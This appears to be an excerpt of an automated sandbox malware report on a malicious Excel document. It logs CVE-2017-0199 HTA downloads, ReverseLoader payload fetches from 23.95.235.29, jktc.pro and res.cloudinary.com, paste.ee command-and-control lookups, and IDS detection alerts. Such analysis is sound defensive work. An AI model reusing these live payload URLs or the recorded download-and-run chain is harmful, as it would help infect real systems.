Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 23.95.235.29:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49167
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.65.137:443 -> 192.168.2.22:49172

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 23.95.235.29 23.95.235.29
Source: Joe Sandbox View	IP Address: 151.101.1.137 151.101.1.137

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 23.95.235.29:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 23.95.235.29:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 23.95.235.29:80

Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14266-6290d7647e9e9"
Source: global traffic	HTTP traffic detected: GET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Thu, 12 Dec 2024 07:14:16 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14266-6290d7647e9e9"

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49172 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.29

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 7_2_000007FE899C7018 URLDownloadToFileW,

7_2_000007FE899C7018

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E2187C.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14266-6290d7647e9e9"
Source: global traffic	HTTP traffic detected: GET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: /Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Thu, 12 Dec 2024 07:14:16 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14266-6290d7647e9e9"

Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: jktc.pro
Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee

Source: mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/
Source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/veryniceb
Source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.501446236.000000001AD84000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494069922.000000000041F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF
Source: powershell.exe, 00000007.00000002.465103812.000000001A950000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.501446236.000000001AD84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFC:
Source: powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFY
Source: powershell.exe, 00000013.00000002.494069922.000000000041F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll
Source: powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll-
Source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFp
Source: mshta.exe, 00000004.00000003.436483754.000000000257D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.439110454.000000000257E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.483432299.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.483622600.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482602942.0000000003E61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
Source: mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...
Source: mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...s
Source: mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...un
Source: mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaC:
Source: mshta.exe, 00000004.00000003.436483754.0000000002575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482272011.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.486809620.0000000002E85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htahttp:/
Source: mshta.exe, 00000004.00000002.440382828.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.00000000002CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htant=gre
Source: mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htareen&t
Source: mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/L9a2M
Source: mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.29/o
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465103812.000000001A91B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
